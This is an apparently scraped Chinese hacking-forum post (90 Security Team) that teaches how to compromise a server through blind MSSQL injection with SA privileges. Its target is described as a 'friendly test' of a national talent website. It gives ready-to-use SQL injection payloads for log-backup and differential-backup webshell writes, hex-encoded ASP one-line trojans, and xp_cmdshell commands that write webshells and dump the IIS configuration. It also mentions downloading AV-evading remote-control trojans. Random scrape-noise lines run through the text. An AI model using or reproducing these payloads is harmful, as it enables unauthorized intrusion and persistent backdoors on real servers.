sa权限的教程.

admin

————————————————————————九零后安全技术小组 | 90 Security  Team -- 打造90后网安精英团队  ———————————————————————————————
$ I/ I/ a& O  H- K: y% j

, x6 f2 U" ^/ E( h- ~# G0 t                                                             欢迎高手访问指导，欢迎新手朋友交流学习。

                                                                 
                                                                 
* _8 e/ m7 n7 U- v4 O6 m8 G                                                                  论坛： http://www.90team.net/
+ L7 W; M- p( H# k& g. K


友情检测国家人才网
+ |8 I- g; \/ k, V% \  j

内容：MSSQL注入SA权限不显错模式下的入侵
2 Z3 q6 \, Y. K$ c, N# N

一般新手扫到不显错的SA（systemadmin）的注入点时，虽然工具能猜表列目录但还是很麻烦有的人就直接放弃了，今天我给大家演示下如何利用。方法很简单大家看操作。

7 V1 \; L4 b, z9 h$ Q( ^  ~% ~我这里使用的是 火狐的插件提交参数。跟在浏览器里直接提交一样。
* I0 M# C$ m+ K: u9 l% A: D
2 h0 Q7 }( q  M) m3 c
- r# h( E0 J% [/ I& \3 b) J+ z这里的主机环境：MSSQL+JSP 权限为不显错的SA，支持多行执行 xp_cmdshell存活 服务器处于内网，WEB和数据库在同一台服务器上。注意这里服务器操作系统是windows2003，IIS，404页面的默认路径是 C:\Windows\Help\iisHelp\common\404b.htm。

% }8 C  e+ c( w0 g思路：
6 H" j, _' J/ H* w0 J
首先：

通过XP_CMDSHELL 执行命令再将执行结果指向IIS的404页面，然后访问WEB站点的一个不存在的目录得到命令执行结果，刺探服务器信息。
$ A0 y* K( \" |* q. ~
1.日志备份获得Webshell

2.数据库差异备份获得Webshell

4.直接下载免杀远控木马。

5.直接下载LCX将服务器端口转发出来
9 P% s0 v/ D+ t- U8 G% k6 T% E8 U
6.通过XP_CMDSHELL 执行命令读取iis配置文件（C:\Windows\system32\inetsrv\MetaBase.xml ）分析查找WEB站点路径并在CMD下写入转义后的一句话获得WEBSHELL上传LCX将服务器转发出来。


" W( }) ^+ h1 i8 c1 C8 I. E5 A
在这里我就不浪费大家时间了，我已经测试过  日志备份和 数据库差异备份 都没有成功 我就不演示了。  直接下载免杀木马。。这个也不用演示了。 直接在注入点后写入一个 DOWN 的VBS脚本下载就行了，
' \2 i$ a4 M: q6 z$ G4 J& h: v
! C. J4 g7 l4 y* D, N) u我直接演示后面一个方法

, M6 B5 u0 T8 x( ]
分析查找WEB站点路径并在CMD下写入转义后的一句话获得WEBSHELL

. F  e' {* h0 _1 k$ a) F
, q% A5 f  Q+ Q
1 I5 q8 ^  b8 m. G0 D
◆日志备份：

. ~. u3 a4 Q0 L5 [& ?; o+ M: {
! p3 j5 {1 I5 V4 W( ]1 G4 f9 g1. 进行初始备份
/ {# W6 {  n9 u3 }; Alter Database TestDB Set Recovery Full Drop Table ttt Create Table ttt (a image) Backup Log TestDB to disk = '<e:\wwwroot\m.asp>' With Init--
8 z: x+ Z9 ~1 I
! F$ C5 z  F3 s4 t3 g3 q4 [) @' m8 [, U2. 插入数据
;Insert Into ttt Values(0x253E3C256576616C2872657175657374286368722839372929293A726573706F6E73652E656E64253E)--
( A& ~) `, U0 |) J1 z
2 P/ F+ x9 k; ]" ]0x253E3C256576616C2872657175657374286368722839372929293A726573706F6E73652E656E64253E   为 一句话木马 %><%eval(request(chr(97))):response.end%>
& T' p; b/ h& e  
3. 备份并获得文件，删除临时表
2 t' \6 L/ Z/ W: O. r) [;Backup Log <数据库名> To Disk = '<e:\wwwroot\m.asp>';Drop Table ttt Alter Database TestDB Set Recovery SIMPLE--

9 O$ T# f- Z, x% v

$ M* U" l; k% H◆数据库差异备份
# W' N8 Z9 g! K
2 ], w% S  W+ M（1. 进行差异备份准备工作

) S( A) g) C  [( [  R* u$ X;Declare @a Sysname;Set @a=db_name();Declare @file VarChar(400);Set @file=<0x633A5C746573742E617370>;Drop Table ttt Create Table ttt(c Image) Backup Database @a To Disk=@file--
5 _* I# R& s( p3 \% `7 t
: n; r% x, E* X+ A上面的 0x633A5C746573742E617370  是 c:\test.asp 路径转换后的16进制编码


" i( |, ]6 Z# H% G3 S' N（2. 将数据写入到数据库
3 z' K9 \5 e" s, L;Insert Into ttt Values(0x253E3C256576616C2872657175657374286368722839372929293A726573706F6E73652E656E64253E)--

9 a" q, G( A  D: Q0x253E3C256576616C2872657175657374286368722839372929293A726573706F6E73652E656E64253E   为 一句话木马 %><%eval(request(chr(97))):response.end%>
% o( J8 z/ _0 v. i
3. 备份数据库并清理临时文件
9 r0 g& ~6 c, C1 Q
;Declare @b SysName;Set @b=db_name();Declare @file1 VarChar(400);Set @file1=<0x633A5C746573742E617370>;Backup Database @b To Disk=@file1 With Differential,Format;Drop Table ttt;--

0x633A5C746573742E617370  为 c:\test.asp  删除临时文件


! {" m- {# [# v2 x0 Z+ F5 G/ A
( z" J" A$ R8 V9 A用^转义字符来写ASP(一句话木马)文件的方法:   

1.注入点后执行;exec master.dbo.xp_cmdshell 'echo ^<script language=VBScript runat=server^>execute request^("90"^)^</script^> >c:\mu.asp';--
7 B5 ?1 X- Y% b. i
2.CMD下执行 echo ^<%execute^(request^("l"^)^)%^> >c:\mu.asp

读取IIS配置信息获取web路径

     
+ g1 w# ]0 }+ {' ]* U$ r/ j     注入点后面执行   ;exec master..xp_cmdshell 'copy C:\Windows\system32\inetsrv\MetaBase.xml C:\Windows\Help\iisHelp\common\404b.htm'--

执行命令
- n8 ^3 I. l; U' |( S) q     
: Z1 w* r8 X. s( y, U% {0 A7 t% O     注入点后面执行   ;exec master..xp_cmdshell 'ver >C:\Windows\Help\iisHelp\common\404b.htm'--

* o: g  L0 q7 u0 ?
1 H  `' l' B6 C9 F- q; R& _+ J6 W
% \0 n6 b/ ?8 P, e
$ l5 S! b) a6 M* N$ z4 o- O- ^

- {0 B, _3 M" I( l' |5 u
; h5 |7 r$ V0 A1 |
. e* V: `9 D8 ^; ~' o
$ a0 l# n4 |, p1 k





) g" n* `4 m, W* a' ~

; B2 G# `& S- l. |: Z$ I, ^9 I

9 T5 X2 U/ r5 _% C+ {1 H# u! ^! m" V

2 _/ c0 z1 S2 x; P6 G. V4 O/ }1 U
; [& j2 k$ s) B% h; u1 L& p. ]
% J0 a& ]1 |1 t- \2 v  j) P8 U


3 V) x4 L4 t# R; k4 U
2 d" r) b) o* v, o$ W+ [- v9 x; ]+ A

3 y' H% j* ]# f* e$ B" ?
: b1 H' G, ~+ V6 }  ~: v# I9 g) z

2 p4 h9 ~$ t) i" u9 j) O& |
1 t# Q1 O4 P/ ^2 k/ r


, G( Y! _  k! `; F/ J
1 l$ f5 y, V6 [/ l





* A$ q  ?& r& f% k3 C4 R, ?